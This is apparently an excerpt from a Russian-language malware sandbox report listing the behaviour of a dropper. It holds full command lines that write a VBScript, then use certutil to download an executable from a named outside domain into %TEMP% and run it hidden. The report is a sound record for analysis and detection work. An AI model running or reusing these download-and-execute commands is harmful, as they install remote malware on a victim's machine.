Техническая информация
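- '<SYSTEM32>\cmd.exe' /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "https://justclickam.com/Paul%20Clark/PO%20059420.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\scr...
  (командная строка в отчёте обрезана; судя по остальным записям, вывод echo, по-видимому, перенаправляется в %TEMP%\script.vbs)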
- %TEMP%\script.vbs
- %TEMP%\script.vbs
- 'ju###lickam.com':443
- 'ju###lickam.com':443
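- DNS ASK ju###lickam.com
  (в сетевых записях домен частично замаскирован символами ###; полностью он указан в URL в командных строках certutil)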
- '<SYSTEM32>\wscript.exe' "%TEMP%\script.vbs"
- '<SYSTEM32>\cmd.exe' /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "https://justclickam.com/Paul%20Clark/PO%20059420.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\scr... (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://justclickam.com/Paul%20Clark/PO%20059420.exe %TEMP%\bin.exe (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bin.exe (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 3
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://justclickam.com/Paul%20Clark/PO%20059420.exe %TEMP%\bin.exe
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://justclickam.com/Paul%20Clark/PO%20059420.exe %TEMP%\bin.exe
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bin.exe